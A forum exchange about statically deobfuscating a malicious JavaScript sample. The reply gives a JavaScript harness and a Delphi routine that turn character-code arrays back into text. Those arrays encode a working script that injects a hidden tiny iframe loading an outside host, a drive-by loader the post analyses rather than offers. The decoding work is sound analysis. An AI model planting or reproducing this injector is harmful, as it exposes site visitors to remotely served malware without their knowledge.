Quote:
|
Could you give me a static analysis way to deobfuscate the Javascript code ?
|
PHP Code:
/* Header information */
document.write('<p style="text-align:center"><font face="courier new" size="3" color="red"><b>[INFORMATION]</b></font></p>');
document.write('<p style="text-align:center"><font face="courier new" size="2" color="blue"><b>javascript sample executed...</b></font></p>');
/* Header information */
mainCode = "";
w = 2;
shellCodeArray = [18/w,18/w,210/w,204/w,64/w,80/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,82/w,246/w,18/w,18/w,18/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,118/w,18/w,18/w,250/w,64/w,202/w,216/w,230/w,202/w,64/w,246/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,238/w,228/w,210/w,232/w,202/w,80/w,68/w,120/w,210/w,204/w,228/w,194/w,218/w,202/w,64/w,230/w,228/w,198/w,122/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,64/w,238/w,210/w,200/w,232/w,208/w,122/w,78/w,98/w,96/w,78/w,64/w,208/w,202/w,210/w,206/w,208/w,232/w,122/w,78/w,98/w,96/w,78/w,64/w,230/w,232/w,242/w,216/w,202/w,122/w,78/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,116/w,208/w,210/w,200/w,200/w,202/w,220/w,118/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,116/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,118/w,216/w,202/w,204/w,232/w,116/w,96/w,118/w,232/w,222/w,224/w,116/w,96/w,118/w,78/w,124/w,120/w,94/w,210/w,204/w,228/w,194/w,218/w,202/w,124/w,68/w,82/w,118/w,18/w,18/w,250/w,18/w,18/w,204/w,234/w,220/w,198/w,232/w,210/w,222/w,220/w,64/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,246/w,18/w,18/w,18/w,236/w,194/w,228/w,64/w,204/w,64/w,122/w,64/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,198/w,228/w,202/w,194/w,232/w,202/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,80/w,78/w,210/w,204/w,228/w,194/w,218/w,202/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,230/w,228/w,198/w,78/w,88/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,82/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,122/w,78/w,208/w,210/w,200/w,200/w,202/w,220/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,122/w,78/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,216/w,202/w,204/w,232/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,232/w,222/w,224/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,238/w,210/w,200/w,232/w,208/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,208/w,202/w,210/w,206/w,208/w,232/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,92/w,194/w,224/w,224/w,202/w,220/w,200/w,134/w,208/w,210/w,216/w,200/w,80/w,204/w,82/w,118/w,18/w,18/w,250/w];
document.write('<p style="text-align:left"><font face="courier new" size="3" color="red"><b>[SHELLCODE]:</b></font></p>');
document.write('<p style="text-align:left"><font face="courier new" size="2" color="blue"><b>' + shellCodeArray + '</b></font></p>');
for (i=0; i<shellCodeArray.length; i++){
mainCode += (String.fromCharCode(shellCodeArray[i]));
}
document.write('<p style="text-align:left"><font face="courier new" size="3" color="red"><b>[MAIN CODE DECODED]:</b></font></p>');
document.write('<p style="text-align:left"><font face="courier new" size="2" color="blue"><b>' + mainCode + '</b></font></p>');
//eval(mainCode);
//alert(mainCode);
Conclusion: The js code is not heavily obfuscated...
shellCodeArray = each value is divided by 2
mainCode = (mainCode + (String.fromCharCode(shellCodeArray[shellCodeArray.length])))
delphi sample:
PHP Code:
function decode(shellCode: array of byte): WideString;
var
x: Integer;
begin
for x := 0 to Length(shellCode) - 1 do
result := result + WideChar(shellCode[x]);
end;
usage:
Code:
procedure TForm1.Button1Click(Sender: TObject);
begin
Memo1.Text := decode([9, 9, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46,
103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84,
97, 103, 78, 97, 109, 101, 40, 39, 98, 111, 100, 121, 39, 41, 91, 48,
93, 41, 123, 9, 9, 9, 105, 102, 114, 97, 109, 101, 114, 40, 41, 59, 9,
9, 125, 32, 101, 108, 115, 101, 32, 123, 9, 9, 9, 100, 111, 99, 117,
109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 105, 102,
114, 97, 109, 101, 32, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47,
47, 107, 111, 112, 111, 108, 101, 52, 105, 108, 111, 57, 46, 99, 122, 46,
99, 99, 47, 105, 47, 102, 116, 112, 49, 39, 32, 119, 105, 100, 116, 104, 61,
39, 49, 48, 39, 32, 104, 101, 105, 103, 104, 116, 61, 39, 49, 48, 39, 32, 115,
116, 121, 108, 101, 61, 39, 118, 105, 115, 105, 98, 105, 108, 105, 116, 121, 58,
104, 105, 100, 100, 101, 110, 59, 112, 111, 115, 105, 116, 105, 111, 110, 58, 97,
98, 115, 111, 108, 117, 116, 101, 59, 108, 101, 102, 116, 58, 48, 59, 116, 111, 112,
58, 48, 59, 39, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62, 34, 41, 59, 9, 9, 125, 9, 9,
102, 117, 110, 99, 116, 105, 111, 110, 32, 105, 102, 114, 97, 109, 101, 114, 40, 41, 123,
9, 9, 9, 118, 97, 114, 32, 102, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99,
114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 105, 102, 114, 97, 109,
101, 39, 41, 59, 102, 46, 115, 101, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 40, 39,
115, 114, 99, 39, 44, 39, 104, 116, 116, 112, 58, 47, 47, 107, 111, 112, 111, 108, 101, 52,
105, 108, 111, 57, 46, 99, 122, 46, 99, 99, 47, 105, 47, 102, 116, 112, 49, 39, 41, 59, 102, 46,
115, 116, 121, 108, 101, 46, 118, 105, 115, 105, 98, 105, 108, 105, 116, 121, 61, 39, 104, 105,
100, 100, 101, 110, 39, 59, 102, 46, 115, 116, 121, 108, 101, 46, 112, 111, 115, 105, 116, 105,
111, 110, 61, 39, 97, 98, 115, 111, 108, 117, 116, 101, 39, 59, 102, 46, 115, 116, 121, 108, 101,
46, 108, 101, 102, 116, 61, 39, 48, 39, 59, 102, 46, 115, 116, 121, 108, 101, 46, 116, 111, 112, 61,
39, 48, 39, 59, 102, 46, 115, 101, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 40, 39, 119, 105,
100, 116, 104, 39, 44, 39, 49, 48, 39, 41, 59, 102, 46, 115, 101, 116, 65, 116, 116, 114, 105, 98, 117,
116, 101, 40, 39, 104, 101, 105, 103, 104, 116, 39, 44, 39, 49, 48, 39, 41, 59, 9, 9, 9, 100, 111, 99,
117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97,
103, 78, 97, 109, 101, 40, 39, 98, 111, 100, 121, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100,
67, 104, 105, 108, 100, 40, 102, 41, 59, 9, 9, 125]);
end;
|